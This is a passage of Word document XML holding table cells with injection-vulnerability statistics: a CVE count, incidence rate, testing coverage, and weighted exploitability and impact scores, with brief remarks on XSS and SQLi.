              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>62,445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15CC6B87" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>The highest CVE count of any category, distributed</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>across 37 unique CWEs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="4C46BF6E" w14:textId="77777777" w:rsidTr="00B064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B3C6F5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average Incidence</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CE46F1C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>3.08% (Max:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>13.77%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7287514C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Highlights how frequently this </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>faw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> appears in standard</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>codebases.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="67B19B2E" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="512AAB50" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Testng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CFAF96C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>100.00% (Avg:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>42.93%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="733F8A82" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Confrms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> that security teams universally test for this</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>faw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> due to its risk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="2FE02AA3" w14:textId="77777777" w:rsidTr="00B064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9B1A97" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Avg. Weighted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1057D565" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>7.15 / 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14A2428F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Signifes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>injecton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>faws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> are highly exploitable and</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45D07C04" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1625"/>
        <w:gridCol w:w="1331"/>
        <w:gridCol w:w="5445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="7E2672EB" w14:textId="77777777" w:rsidTr="00B064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328642" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5585E4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Value /</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Percentage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EFE5597" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Signifcance</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="04214F81" w14:textId="77777777" w:rsidTr="00B064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13A552" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20BA0FAF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CF87EB3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>easy to weaponize.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="570D51C6" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CF3BD5E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Avg. Weighted</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DB466C8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>4.32 / 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CD80A3C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Skewed lower due to high-frequency/low-impact </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>faws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>like XSS, but severe instances (like SQLi) remain</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>catastrophic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
